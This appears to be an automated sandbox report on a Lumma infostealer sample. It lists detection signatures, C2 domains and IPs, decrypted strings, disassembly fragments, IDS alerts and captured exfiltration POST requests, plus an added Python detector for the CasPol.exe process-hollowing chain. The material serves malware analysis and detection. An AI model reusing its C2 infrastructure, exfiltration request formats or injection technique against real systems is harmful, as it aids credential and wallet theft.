Windows Analysis Report
BigProject.exe

Overview

General Information

Sample name: BigProject.exe
Analysis ID: 1579291
MD5: 98acefb3b4d697642895f954c5256a49
SHA1: 6db25168111275435e21e68773dc88d1cf86cfd9
SHA256: 36ae8fda3c54b17e1a0609c07aab00a27c435244e19990d45327e21b16455718
Tags: exe, user-aachum

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
Adds / modifies Windows certificates
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to read the clipboard data
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
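The signatures above describe the injection chain seen in this analysis: BigProject.exe creates C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe in suspended mode, writes a PE image into it, and the CasPol.exe process then carries the stealer logic and the C2 traffic. The following Python is an added example of how that chain would surface in host telemetry; it is not part of the Joe Sandbox report. The events are constructed in a Sysmon-like shape (ProcessCreate, NetworkConnect, ProcessAccess): the field names, PIDs, the access mask and the benign administrator run are assumptions, while the image paths and the C2 address come from this report.

```python
"""Host-side detection of the BigProject.exe -> CasPol.exe hollowing chain.

Added example, not code from the Joe Sandbox report. The telemetry below is
constructed to resemble Sysmon records; field names, PIDs and masks are
assumptions, the paths and the C2 IP are taken from the report.
"""
import ipaddress
from collections import defaultdict

CASPOL = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
DROPPER = r"C:\Users\user\Desktop\BigProject.exe"

# Access-mask bits from the Win32 PROCESS_* constants: writing a PE into a
# foreign process needs both VM_OPERATION (protect/alloc) and VM_WRITE.
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_WRITE = 0x0020
WRITE_MASK = PROCESS_VM_OPERATION | PROCESS_VM_WRITE

# Directories a legitimate parent of CasPol.exe is expected to live in (assumption).
TRUSTED_PARENT_DIRS = ("c:\\windows\\", "c:\\program files")

# Constructed events: id 1 = ProcessCreate, 3 = NetworkConnect, 10 = ProcessAccess.
EVENTS = [
    {"id": 1, "pid": 4120, "image": DROPPER, "cmd": f'"{DROPPER}"',
     "ppid": 3300, "parent": r"C:\Windows\explorer.exe"},
    {"id": 1, "pid": 5208, "image": CASPOL, "cmd": CASPOL,
     "ppid": 4120, "parent": DROPPER},
    {"id": 10, "pid": 4120, "image": DROPPER,
     "target_pid": 5208, "target": CASPOL, "granted": 0x1FFFFF},
    {"id": 3, "pid": 5208, "image": CASPOL,
     "dst_ip": "172.67.197.170", "dst_port": 443},
    # Benign control: an administrator listing machine policy from cmd.exe.
    {"id": 1, "pid": 6000, "image": CASPOL, "cmd": f"{CASPOL} -m -lg",
     "ppid": 900, "parent": r"C:\Windows\System32\cmd.exe"},
]


def is_caspol(path):
    return path.lower().endswith("\\caspol.exe")


def trusted_parent(path):
    return path.lower().startswith(TRUSTED_PARENT_DIRS)


def has_arguments(cmd, image):
    """True if anything follows the image path (quoted or bare) on the command line."""
    rest = cmd.strip()
    for form in (f'"{image}"', image):
        if rest.lower().startswith(form.lower()):
            rest = rest[len(form):]
            break
    return bool(rest.strip())


def analyze(events):
    """Return {caspol_pid: [rule, ...]} for CasPol.exe processes that trip more than one rule."""
    hits = defaultdict(list)
    for ev in events:
        if ev["id"] == 1 and is_caspol(ev["image"]):
            # CasPol.exe is a .NET policy tool; a parent outside Windows or
            # Program Files, started with no arguments, is the hollowing pattern.
            if not trusted_parent(ev["parent"]):
                hits[ev["pid"]].append("caspol_untrusted_parent")
            if not has_arguments(ev["cmd"], ev["image"]):
                hits[ev["pid"]].append("caspol_no_arguments")
        elif ev["id"] == 10 and is_caspol(ev["target"]):
            if ev["granted"] & WRITE_MASK == WRITE_MASK:
                hits[ev["target_pid"]].append("foreign_write_into_caspol")
        elif ev["id"] == 3 and is_caspol(ev["image"]):
            # The real tool has no reason to reach a public address.
            if ipaddress.ip_address(ev["dst_ip"]).is_global:
                hits[ev["pid"]].append("caspol_outbound_connection")
    # A lone "no arguments" run is just the tool printing its usage text,
    # so require at least two rules before reporting a process.
    return {pid: rules for pid, rules in hits.items() if len(rules) > 1}


if __name__ == "__main__":
    for pid, rules in analyze(EVENTS).items():
        print(pid, ", ".join(rules))
```

The single strongest signal here is the NetworkConnect from CasPol.exe: the genuine binary manipulates local code-access-security policy and never opens a socket, so any outbound TLS from it is worth an alert on its own, whatever the parent looks like.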

Classification

Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs / Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

AV Detection

Source: 00000000.00000003.2452421280.0000000003A21000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: LummaC {"C2 url": ["rapeflowwj.lat", "sustainskelet.lat", "grannyejh.lat", "aspecteirs.lat", "discokeyus.lat", "crosshuaht.lat", "energyaffai.lat", "necklacebudi.lat", "stem-mellows.cyou"], "Build id": "OPCN2M--Sergei"}
Source: BigProject.exe VirusTotal: Detection: 15%
Source: BigProject.exe ReversingLabs: Detection: 15%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: rapeflowwj.lat
Source: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: crosshuaht.lat
Source: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: sustainskelet.lat
Source: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: aspecteirs.lat
Source: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: energyaffai.lat
Source: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: necklacebudi.lat
Source: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: discokeyus.lat
Source: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: grannyejh.lat
Source: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: stem-mellows.cyou
Source: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: TeslaBrowser/5.5
Source: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: - Screen Resoluton:
Source: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: - Physical Installed Memory:
Source: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: Workgroup: -
Source: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: OPCN2M--Sergei
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_00415799 CryptUnprotectData, 7_2_00415799
Source: BigProject.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:49741 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:49750 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:49756 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:49762 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:49773 version: TLS 1.2
Source: BigProject.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then movzx edx, byte ptr [esp+eax-0Dh] 7_2_00423860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then mov byte ptr [esi], al 7_2_0042DA53
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h] 7_2_0043ECA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then mov ecx, eax 7_2_00409580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then mov word ptr [ebp+00h], ax 7_2_00409580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then movzx esi, byte ptr [ebp+ebx-10h] 7_2_0043C767
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then lea edx, dword ptr [ecx+01h] 7_2_0040B70C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then mov esi, eax 7_2_00415799
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then mov ecx, eax 7_2_00415799
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then jmp eax 7_2_0042984F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then mov edx, ecx 7_2_00438810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then cmp dword ptr [edi+ebp*8], 5E874B5Fh 7_2_00438810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then cmp dword ptr [edx+edi*8], BC9C9AFCh 7_2_00438810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then test eax, eax 7_2_00438810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then mov byte ptr [edi], al 7_2_0041682D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax+18h] 7_2_0041682D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then movzx ebx, byte ptr [esp+ecx-75h] 7_2_0041682D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then mov word ptr [ecx], bp 7_2_0041D83A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then push C0BFD6CCh 7_2_00423086
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then push C0BFD6CCh 7_2_00423086
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then add ebp, dword ptr [esp+0Ch] 7_2_0042B170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then mov eax, dword ptr [esp+00000080h] 7_2_004179C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], E5FE86B7h 7_2_0043B1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then mov ebx, eax 7_2_0043B1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then mov word ptr [ecx], dx 7_2_004291DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then mov ecx, dword ptr [ebp-20h] 7_2_004291DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then mov ebx, eax 7_2_00405990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then mov ebp, eax 7_2_00405990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then mov ebx, esi 7_2_00422190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then mov word ptr [ebx], cx 7_2_00422190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h 7_2_00422190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then mov byte ptr [edi], cl 7_2_0042CA49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then movzx esi, byte ptr [esp+eax-7D4F867Fh] 7_2_00416263
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then movzx edx, byte ptr [esp+eax+61D008CBh] 7_2_00415220
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then push esi 7_2_00427AD3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then mov byte ptr [edi], cl 7_2_0042CAD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then mov word ptr [ebx], ax 7_2_0041B2E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then push ebx 7_2_0043CA93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then mov word ptr [eax], cx 7_2_0041CB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then mov word ptr [esi], cx 7_2_0041CB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then mov word ptr [eax], cx 7_2_00428B61
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then mov byte ptr [edi], cl 7_2_0042CB11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then mov byte ptr [edi], cl 7_2_0042CB22
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then movzx edx, byte ptr [esp+eax] 7_2_0043F330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then mov ebx, eax 7_2_0040DBD9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then mov ebx, eax 7_2_0040DBD9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then movzx esi, byte ptr [esp+ecx-7D4F867Fh] 7_2_00417380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then cmp word ptr [ebx+edi+02h], 0000h 7_2_0041D380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then cmp al, 2Eh 7_2_00426B95
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then movzx ebx, byte ptr [edx] 7_2_00435450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then movzx esi, byte ptr [esp+ecx-7D4F867Fh] 7_2_00417380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then push 00000000h 7_2_00429C2B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then mov word ptr [ecx], dx 7_2_004291DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then mov ecx, dword ptr [ebp-20h] 7_2_004291DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h] 7_2_004074F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then movzx ecx, word ptr [edi+esi*4] 7_2_004074F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then cmp dword ptr [ebx+edi*8], 9C259492h 7_2_004385E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then jmp eax 7_2_004385E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then movzx edi, byte ptr [esp+ecx-7D4F88C7h] 7_2_00417DEE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then jmp dword ptr [0044450Ch] 7_2_00418591
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then mov eax, dword ptr [ebp-68h] 7_2_00428D93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then xor edi, edi 7_2_0041759F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then mov eax, dword ptr [0044473Ch] 7_2_0041C653
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then mov edx, ebp 7_2_00425E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then jmp dword ptr [004455F4h] 7_2_00425E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then mov ecx, eax 7_2_0043AEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then xor byte ptr [esp+eax+17h], al 7_2_00408F50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then mov byte ptr [edi], bl 7_2_00408F50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then mov ebx, dword ptr [edi+04h] 7_2_0042A700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then mov byte ptr [esi], al 7_2_0041BF14
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then mov eax, dword ptr [ebx+edi+44h] 7_2_00419F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax+423C9D38h] 7_2_0041E7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then movzx eax, word ptr [edx] 7_2_004197C2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then mov word ptr [edi], dx 7_2_004197C2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then mov word ptr [esi], cx 7_2_004197C2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then mov ecx, ebx 7_2_0042DFE9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then jmp ecx 7_2_0040BFFD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h] 7_2_0043EFB0

Networking

Source: Network traffic Suricata IDS: 2058360 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat) : 192.168.2.5:64951 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.5:49709 -> 172.67.197.170:443
Source: Network traffic Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.5:49715 -> 172.67.197.170:443
Source: Network traffic Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.5:49741 -> 172.67.197.170:443
Source: Network traffic Suricata IDS: 2058364 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) : 192.168.2.5:58190 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.5:49731 -> 172.67.197.170:443
Source: Network traffic Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.5:49750 -> 172.67.197.170:443
Source: Network traffic Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.5:49773 -> 172.67.197.170:443
Source: Network traffic Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.5:49756 -> 172.67.197.170:443
Source: Network traffic Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.5:49762 -> 172.67.197.170:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49709 -> 172.67.197.170:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49709 -> 172.67.197.170:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49756 -> 172.67.197.170:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49773 -> 172.67.197.170:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49715 -> 172.67.197.170:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49715 -> 172.67.197.170:443
Source: Malware configuration extractor URLs: rapeflowwj.lat
Source: Malware configuration extractor URLs: sustainskelet.lat
Source: Malware configuration extractor URLs: grannyejh.lat
Source: Malware configuration extractor URLs: aspecteirs.lat
Source: Malware configuration extractor URLs: discokeyus.lat
Source: Malware configuration extractor URLs: crosshuaht.lat
Source: Malware configuration extractor URLs: energyaffai.lat
Source: Malware configuration extractor URLs: necklacebudi.lat
Source: Malware configuration extractor URLs: stem-mellows.cyou
Source: Joe Sandbox View IP Address: 185.199.110.133
Source: Joe Sandbox View IP Address: 172.67.197.170
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49709 -> 172.67.197.170:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49715 -> 172.67.197.170:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49741 -> 172.67.197.170:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49731 -> 172.67.197.170:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49750 -> 172.67.197.170:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49756 -> 172.67.197.170:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49773 -> 172.67.197.170:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49762 -> 172.67.197.170:443
Source: global traffic HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: discokeyus.lat
Source: global traffic HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 48
    Host: discokeyus.lat
Source: global traffic HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=JJCHZ09245IHFZ
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 12812
    Host: discokeyus.lat
Source: global traffic HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=BTXLCIL19R05PAIV
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 15066
    Host: discokeyus.lat
Source: global traffic HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=JBUIQ349L
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 20514
    Host: discokeyus.lat
Source: global traffic HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=QI8UC3UJNMKBV
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 1258
    Host: discokeyus.lat
Source: global traffic HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=WLEMZG0B
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 422841
    Host: discokeyus.lat
Source: global traffic HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 83
    Host: discokeyus.lat
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected:
    GET /AromatcHEBUYRKOS/chekingbebra/refs/heads/main/NavanItinerary.pdf HTTP/1.1
    User-Agent: cs
    Host: raw.githubusercontent.com
    Cache-Control: no-cache
